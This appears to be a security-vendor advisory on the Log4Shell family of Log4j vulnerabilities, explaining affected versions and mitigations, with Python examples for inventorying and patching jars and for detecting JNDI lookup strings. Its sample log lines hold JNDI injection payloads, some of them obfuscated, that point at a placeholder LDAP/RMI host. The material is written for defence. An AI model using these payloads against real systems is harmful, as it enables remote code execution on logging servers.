23.12.2021: DerScanner’s vulnerability database now includes zero-day threats from Log4Shell – DerScanner
CVE-2021-44228 (CVSS Threat Score: 10/10) — critical remote code execution vulnerability affecting Log4j 2 versions 2.0-beta9 through 2.14.1. Partially fixed in 2.15.0.
The attack consists of getting a Java application or server that logs with Log4j to log a string under the attacker's control (for example a User-Agent header or a user name) containing a JNDI lookup of the form ${jndi:ldap://<attacker host>/a}. The string does not have to be stored and processed later: while formatting the log message, Log4j resolves the lookup, connects to the attacker's LDAP (or RMI, DNS or similar) server and can be made to load a remote Java class or deserialize a malicious object. As a result, the attacker gains code execution with the privileges of the logging process and full control over the vulnerable application or server. After that, the attack can develop further.
The Apache Software Foundation released an emergency update, 2.15.0, which resolved the issue only partially: it disabled message lookups by default and restricted JNDI connections to localhost, but it did not account for certain non-default logging configurations in which attacker-controlled data still reaches the lookup machinery.
Specifically, when the logging configuration uses a Pattern Layout with a Context Lookup (for example $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc or %MDC), an attacker who controls Thread Context Map input can supply a value containing a JNDI lookup pattern. This leads to an information leak, denial of service and, in some environments, remote code execution, and was assigned its own identifier, CVE-2021-45046.
Before 2.15.0, CVE-2021-44228 is exploitable whenever message lookups are enabled, which is the default: the system property log4j2.formatMsgNoLookups (or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS) is false unless explicitly set. 2.15.0 makes disabled lookups the default, and they should not be re-enabled after upgrading. Users who cannot update immediately can set the property to true as a stop-gap, with two caveats: the property only exists in 2.10.0 and later (for older releases Apache's recommended mitigation is to remove the JndiLookup class from the log4j-core jar), and it does not cover the non-default configurations behind CVE-2021-45046, so upgrading remains the only complete fix.
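The inventory check a practitioner wants at this point is which log4j-core jars are on a host, which release they carry and whether the JndiLookup class is still present. The script below is an added example, not DerScanner's or Apache Log4j's code: it reads the version from the Maven pom.properties that log4j-core jars ship, maps it onto the three Log4j 2 CVEs on this page using the first-fixed releases per branch from the Apache security advisories (2.15.0/2.16.0/2.17.0 for the Java 8 main line, 2.12.2/2.12.3 for Java 7, 2.3.1 for Java 6), and implements the class-removal mitigation for releases that predate the formatMsgNoLookups property. The sample jars it builds are constructed fixtures with placeholder bytes, not real builds.

```python
"""Added example (not DerScanner's or Apache Log4j's code): find log4j-core jars
under a directory, read the version they ship, map it onto the three Log4j 2
CVEs on this page and, for releases older than 2.10.0 (no formatMsgNoLookups
property), apply Apache's alternative mitigation of removing JndiLookup.class.
Sample jars are constructed inline (placeholder bytes) so the script runs offline."""
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# First fixed release per branch (Java 8 main line, 2.12.x Java 7, 2.3.x Java 6), per Apache.
FIXES = {
    "CVE-2021-44228": ("2.15.0", "2.12.2", "2.3.1"),
    "CVE-2021-45046": ("2.16.0", "2.12.2", "2.3.1"),
    "CVE-2021-45105": ("2.17.0", "2.12.3", "2.3.1"),
}
FIRST_AFFECTED = {"CVE-2021-44228": "2.0-beta9", "CVE-2021-45046": "2.0-beta9",
                  "CVE-2021-45105": "2.0-alpha1"}
STAGES = {"alpha": 0, "beta": 1, "rc": 2}  # pre-release tags sort before final (3)

def parse_version(text):
    """'2.0-beta9' -> (2, 0, 0, 1, 9); '2.14.1' -> (2, 14, 1, 3, 0)."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?", text.strip())
    if not m:
        raise ValueError("unrecognised Log4j version: %r" % text)
    stage, num = (STAGES[m[4]], int(m[5])) if m[4] else (3, 0)
    return (int(m[1]), int(m[2]), int(m[3] or 0), stage, num)

def affected_cves(version):
    """CVEs from this page the given log4j-core version is still exposed to.
    Log4j 1.x falls below every range here; CVE-2021-4104 is a separate check."""
    v = parse_version(version)
    exposed = []
    for cve, fixes in FIXES.items():
        if v < parse_version(FIRST_AFFECTED[cve]):
            continue
        fixed = [parse_version(f) for f in fixes]
        # A branch with its own backport is judged against it, others against the main line.
        on_branch = [f for f in fixed if f[:2] == v[:2]]
        if v < (on_branch[0] if on_branch else max(fixed)):
            exposed.append(cve)
    return exposed

def inspect_jar(path):
    """Return (version or None, JndiLookup.class present) for one jar."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        return version, JNDI_LOOKUP_CLASS in names

def scan_tree(root):
    """Map each log4j-core jar under root to version, JNDI status and exposed CVEs.
    Jars nested inside .war/.ear archives are not unpacked here."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".jar"):
                continue
            path = os.path.join(dirpath, name)
            version, has_jndi = inspect_jar(path)
            if version is None and not has_jndi:
                continue  # not log4j-core
            findings[path] = {"version": version, "jndi_lookup_present": has_jndi,
                              "cves": affected_cves(version) if version else ["unknown"]}
    return findings

def strip_jndi_lookup(path):
    """Rewrite the jar without JndiLookup.class (zipfile cannot delete in place);
    same effect as Apache's 'zip -q -d log4j-core-*.jar <class path>'. True if removed."""
    tmp, removed = path + ".tmp", False
    with zipfile.ZipFile(path) as src, zipfile.ZipFile(tmp, "w") as dst:
        for item in src.infolist():
            if item.filename == JNDI_LOOKUP_CLASS:
                removed = True
                continue
            dst.writestr(item, src.read(item.filename))  # keeps entry metadata
    os.replace(tmp, path)
    return removed

def make_sample_jar(directory, version):
    """Constructed fixture shaped like log4j-core (not a real build)."""
    path = os.path.join(directory, "log4j-core-%s.jar" % version)
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PROPERTIES, "artifactId=log4j-core\nversion=%s\n" % version)
        zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder, not bytecode
    return path

if __name__ == "__main__":
    work = tempfile.mkdtemp()
    for v in ("2.0-beta9", "2.12.2", "2.14.1", "2.17.0"):
        make_sample_jar(work, v)
    for path, info in sorted(scan_tree(work).items()):
        print(os.path.basename(path), info)
    old = os.path.join(work, "log4j-core-2.0-beta9.jar")
    print("JndiLookup.class removed:", strip_jndi_lookup(old), inspect_jar(old))
```

Point scan_tree at the application's library directory rather than the temporary fixture. Note that 2.12.2 is reported as exposed only to CVE-2021-45105, which is the behaviour the exception in the text describes. strip_jndi_lookup is for hosts that cannot be upgraded; the class is loaded lazily, so restart the JVM after applying it, and treat it as a stop-gap rather than a fix.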
CVE-2021-45046 (CVSS Threat Score: 9/10) — critical vulnerability exploitable, in the non-default configurations described above, for denial of service and remote code execution. It affects Log4j 2 versions 2.0-beta9 through 2.15.0, with the exception of 2.12.2, the Java 7 release that already carries the fix.
Even in 2.15.0 the CVE-2021-44228 attack remained possible under the custom configurations just described, because only the message lookup path into JNDI had been disabled. In 2.16.0 JNDI support is disabled by default (it must be explicitly enabled with log4j2.enableJndi=true) and message lookup processing was removed entirely.
CVE-2021-45105 (CVSS Threat Score: 7.5/10) — denial-of-service vulnerability. When the logging configuration uses a non-default Pattern Layout with a Context Lookup such as $${ctx:loginId}, an attacker who controls Thread Context Map input can supply a self-referential lookup that causes uncontrolled recursion: the process loops until the stack is exhausted and terminates with a StackOverflowError.
The vulnerability affects Log4j 2 versions 2.0-alpha1 through 2.16.0, which lacked protection against runaway recursion from self-referential lookups. The fix shipped in 2.17.0 (Java 8) and was backported as 2.12.3 (Java 7) and 2.3.1 (Java 6).
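The lookup substitution that makes the CVE-2021-44228 payload work is the same machinery that runs away in CVE-2021-45105, so one small model serves both passages. The code below is an added example, not Log4j's own code or DerScanner's: it re-implements the ${...} substitution for only the lower:, upper: and ctx: lookups and the :-default syntax, and it deliberately never resolves a jndi: variable, leaving it literal so that a detector can match it after obfuscated variants such as ${${lower:j}ndi:...} or ${${::-j}${::-n}${::-d}${::-i}:...} have been normalised. The second half reproduces the self-referential Thread Context lookup with and without a depth guard; the guard is a simplification standing in for the protection 2.17.0 added, not its actual code. The access-log lines, the 203.0.113.0/24 addresses and the depth limits are constructed for illustration.

```python
"""Added example (not Log4j's or DerScanner's code): a minimal model of the
${...} lookup substitution Log4j 2 applies to messages and to Context Lookups
in a Pattern Layout, supporting only lower/upper/ctx and the ':-' default
syntax. A jndi: variable is never resolved here; it is left literal so that a
detector can see it. Sample log lines are constructed, not captured traffic."""
import re

class LookupDepthExceeded(Exception):
    """Raised by the guarded resolver instead of letting recursion run away."""

class Resolver:
    def __init__(self, context, max_depth=None):
        self.context = context      # stands in for the Thread Context Map (MDC)
        self.max_depth = max_depth  # None reproduces the unguarded, pre-2.17.0 shape

    def lookup(self, key):
        """Resolve one variable body; None means 'leave it literal'."""
        if key.lower().startswith("jndi:"):
            return None             # also stops a trailing ':-x' from hiding a jndi payload
        if ":-" in key:             # ${name:-default}
            name, default = key.split(":-", 1)
            value = self.lookup(name)
            return default if value is None else value
        prefix, _, name = key.partition(":")
        if prefix == "lower":
            return name.lower()
        if prefix == "upper":
            return name.upper()
        if prefix == "ctx":
            return self.context.get(name)
        return None                 # env:, sys:, date:, ... not modelled

    @staticmethod
    def _closing_brace(text, start):
        """Index of the '}' matching the '${' at start, honouring nesting; -1 if none."""
        depth, i = 0, start
        while i < len(text):
            if text.startswith("${", i):
                depth, i = depth + 1, i + 2
                continue
            if text[i] == "}":
                depth -= 1
                if depth == 0:
                    return i
            i += 1
        return -1

    def resolve(self, text, depth=0):
        if self.max_depth is not None and depth > self.max_depth:
            raise LookupDepthExceeded(depth)
        out, i = [], 0
        while True:
            start = text.find("${", i)
            end = self._closing_brace(text, start) if start >= 0 else -1
            if end < 0:
                out.append(text[i:])
                return "".join(out)
            out.append(text[i:start])
            inner = self.resolve(text[start + 2:end], depth + 1)  # nested lookups first
            value = self.lookup(inner)
            if value is None:
                out.append("${" + inner + "}")                   # unresolved: keep literal
            else:
                out.append(self.resolve(value, depth + 1))       # re-substitute the result
            i = end + 1

JNDI_PATTERN = re.compile(r"\$\{jndi:", re.IGNORECASE)

def detect_jndi(line, max_depth=8):
    """Normalise one log line or header value; return ('clean'|'jndi'|'depth-exceeded', text).
    The resolver always runs guarded: an unbounded normaliser is itself a CVE-2021-45105 target."""
    try:
        normalised = Resolver({}, max_depth=max_depth).resolve(line)
    except LookupDepthExceeded:
        return "depth-exceeded", line
    return ("jndi" if JNDI_PATTERN.search(normalised) else "clean"), normalised

SAMPLE_LINES = [  # constructed access-log lines with a quoted User-Agent field
    '203.0.113.5 "GET /login HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.5 "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.5 "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.9/a}"',
    '203.0.113.5 "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.9/a}"',
    '203.0.113.5 "GET / HTTP/1.1" 200 "${${lower:J}ndi:ldap://203.0.113.9/a:-x}"',
]

def recursion_demo(max_depth):
    """Pattern '${ctx:loginId}' where the attacker-controlled Thread Context value
    refers back to itself (simplified; the published trigger strings are more elaborate)."""
    resolver = Resolver({"loginId": "${ctx:loginId}"}, max_depth=max_depth)
    try:
        resolver.resolve("user=${ctx:loginId}")
        return "resolved"
    except RecursionError:
        return "stack exhausted"    # unguarded: the JVM equivalent is the StackOverflowError
    except LookupDepthExceeded:
        return "depth limit hit"    # guarded: the log event fails, the process survives

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print("%-15s %s" % detect_jndi(line))
    print("unguarded:", recursion_demo(None))
    print("guarded:  ", recursion_demo(16))
```

The normalisation step is what makes the detector useful: a plain substring match on "${jndi:" misses the lower:/default-value obfuscations above, while evaluating the lookups the way Log4j does collapses them back to the canonical prefix. The same evaluation is why the detector itself needs the depth guard, which is the point of CVE-2021-45105.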
CVE-2021-4104 (CVSS Threat Score: 8.1/10) — insecure deserialization in the JMSAppender of Log4j 1.2. An attacker with write access to the Log4j configuration can set the appender's TopicBindingName or TopicConnectionFactoryBindingName to a JNDI reference, making JMSAppender perform JNDI requests and deserialize the result, with remote code execution in a similar fashion to CVE-2021-44228; deployments that do not configure JMSAppender (it is not the default) are not affected. Log4j 1.x reached end of life in August 2015 and receives no patch; the fix is to migrate to 2.17.0.